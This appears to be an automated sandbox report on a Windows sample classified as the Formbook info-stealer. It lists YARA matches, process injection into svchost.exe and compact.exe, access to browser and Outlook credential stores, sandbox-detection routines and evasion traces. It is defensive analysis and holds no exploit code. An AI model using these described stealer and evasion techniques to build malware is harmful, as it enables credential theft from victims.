Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004E5320	7_2_004E5320
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004E34C9	7_2_004E34C9
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004E350B	7_2_004E350B
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004E3510	7_2_004E3510
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004FB930	7_2_004FB930
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_00ADE458	7_2_00ADE458
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_00ADE454	7_2_00ADE454
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_00ADE573	7_2_00ADE573
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_00ADC995	7_2_00ADC995
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_00ADE90C	7_2_00ADE90C
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_00ADD978	7_2_00ADD978
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_00ADCC08	7_2_00ADCC08

Source: C:\Windows\SysWOW64\compact.exe	Code function: String function: 02E1F290 appears 105 times
Source: C:\Windows\SysWOW64\compact.exe	Code function: String function: 02D8B970 appears 280 times
Source: C:\Windows\SysWOW64\compact.exe	Code function: String function: 02DE7E54 appears 111 times
Source: C:\Windows\SysWOW64\compact.exe	Code function: String function: 02DD5130 appears 58 times
Source: C:\Windows\SysWOW64\compact.exe	Code function: String function: 02E0EA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0302B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03075130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03087E54 appears 102 times
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: String function: 00B99CB3 appears 31 times
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: String function: 00BAF9F2 appears 40 times
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: String function: 00BB0A30 appears 46 times

Source: bintoday1.exe, 00000000.00000003.2188299011.0000000003A4D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs bintoday1.exe
Source: bintoday1.exe, 00000000.00000003.2183977537.0000000003853000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs bintoday1.exe

Source: bintoday1.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2460538181.0000000002F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4010508609.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4023622986.00000000009D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4022626506.0000000000980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2460077708.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4026387029.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2461015937.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4023857362.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@9/8

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00C037B5 GetLastError,FormatMessageW,

0_2_00C037B5

Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BF10BF AdjustTokenPrivileges,CloseHandle,		0_2_00BF10BF
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BF16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00BF16C3

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00C051CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00C051CD

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00C1A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00C1A67C

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00C0648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_00C0648E

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00B942A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00B942A2

Source: C:\Users\user\Desktop\bintoday1.exe

File created: C:\Users\user\AppData\Local\Temp\aut76CA.tmp

Jump to behavior

Source: bintoday1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\bintoday1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: compact.exe, 00000007.00000002.4015509843.000000000077F000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000003.2646911279.0000000000789000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000003.2644521853.000000000075E000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000003.2644663587.000000000077F000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4015509843.00000000007AC000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: bintoday1.exe	Virustotal: Detection: 63%
Source: bintoday1.exe	ReversingLabs: Detection: 63%

Source: unknown	Process created: C:\Users\user\Desktop\bintoday1.exe "C:\Users\user\Desktop\bintoday1.exe"
Source: C:\Users\user\Desktop\bintoday1.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\bintoday1.exe"
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"
Source: C:\Windows\SysWOW64\compact.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\bintoday1.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\bintoday1.exe"	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\bintoday1.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\compact.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\compact.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: bintoday1.exe

Static file information: File size 1274880 > 1048576

Source: bintoday1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: bintoday1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: bintoday1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: bintoday1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: bintoday1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: bintoday1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: bintoday1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: compact.pdbGCTL source: svchost.exe, 00000002.00000003.2416928087.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2417029817.0000000002A24000.00000004.00000020.00020000.00000000.sdmp, eypfpUNFpbLX.exe, 00000006.00000002.4020528447.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eypfpUNFpbLX.exe, 00000006.00000000.2369272396.00000000005FE000.00000002.00000001.01000000.00000005.sdmp, eypfpUNFpbLX.exe, 00000009.00000000.2528816800.00000000005FE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: bintoday1.exe, 00000000.00000003.2184813906.0000000003780000.00000004.00001000.00020000.00000000.sdmp, bintoday1.exe, 00000000.00000003.2178684389.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2460602943.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346609007.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2348425557.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2460602943.000000000319E000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000007.00000003.2460297074.0000000000986000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4024433236.0000000002EFE000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4024433236.0000000002D60000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000007.00000003.2463034402.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: bintoday1.exe, 00000000.00000003.2184813906.0000000003780000.00000004.00001000.00020000.00000000.sdmp, bintoday1.exe, 00000000.00000003.2178684389.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2460602943.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346609007.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2348425557.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2460602943.000000000319E000.00000040.00001000.00020000.00000000.sdmp, compact.exe, compact.exe, 00000007.00000003.2460297074.0000000000986000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4024433236.0000000002EFE000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4024433236.0000000002D60000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000007.00000003.2463034402.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compact.pdb source: svchost.exe, 00000002.00000003.2416928087.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2417029817.0000000002A24000.00000004.00000020.00020000.00000000.sdmp, eypfpUNFpbLX.exe, 00000006.00000002.4020528447.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: compact.exe, 00000007.00000002.4015509843.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4026214953.000000000338C000.00000004.10000000.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4024011775.0000000002B4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2753680676.0000000019EAC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: compact.exe, 00000007.00000002.4015509843.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000007.00000002.4026214953.000000000338C000.00000004.10000000.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4024011775.0000000002B4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2753680676.0000000019EAC000.00000004.80000000.00040000.00000000.sdmp

Source: bintoday1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: bintoday1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: bintoday1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: bintoday1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: bintoday1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00B942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00B942DE

Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BB0A76 push ecx; ret	0_2_00BB0A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0047216F push esp; iretd	2_2_004721B7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0047212C push ecx; retf	2_2_00472133
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004721BC push esi; iretd	2_2_004721D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00481AB3 push ds; retf	2_2_00481ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00494313 push esi; ret	2_2_0049431B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00471CB0 push ecx; retf	2_2_00471CB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004735A0 push eax; ret	2_2_004735A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00484660 push 2FC0C6F3h; iretd	2_2_0048467E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00493F93 push ecx; iretd	2_2_00493FA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx	2_2_030309B6
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Code function: 6_2_0333CBBC push ebx; ret	6_2_0333CC37
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Code function: 6_2_0333FA49 push ecx; retf	6_2_0333FA4A
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Code function: 6_2_0333D2AB push 3D07CFE4h; iretd	6_2_0333D318
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Code function: 6_2_0333CF5B push edx; retf	6_2_0333CF5C
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Code function: 6_2_0333864A push ds; retf	6_2_03338663
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Code function: 6_2_0333CC1C push ebx; ret	6_2_0333CC37
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02D909AD push ecx; mov dword ptr [esp], ecx	7_2_02D909B6
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_02D61366 push eax; iretd	7_2_02D61369
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004DE510 push ds; retf	7_2_004DE529
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004F09E8 push ecx; iretd	7_2_004F0A00
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004F09F0 push ecx; iretd	7_2_004F0A00
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004F0D62 push esi; ret	7_2_004F0D78
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004F0D79 push 00000001h; ret	7_2_004F0D99
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004F0D70 push esi; ret	7_2_004F0D78
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004F0DB5 push 00000001h; ret	7_2_004F0D99
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004F146B push cs; ret	7_2_004F1474
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_004F141D push cs; ret	7_2_004F1474
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_00AE0068 push cs; iretd	7_2_00AE00D6
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_00ADA27A push es; iretd	7_2_00ADA27E
Source: C:\Windows\SysWOW64\compact.exe	Code function: 7_2_00ADF488 push ss; ret	7_2_00ADF4A7

Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BAF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00BAF98E
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00C21C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00C21C41

Source: C:\Users\user\Desktop\bintoday1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\bintoday1.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-98781

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\bintoday1.exe	API/Special instruction interceptor: Address: 33431F4
Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\compact.exe	API/Special instruction interceptor: Address: 7FFDB442D544
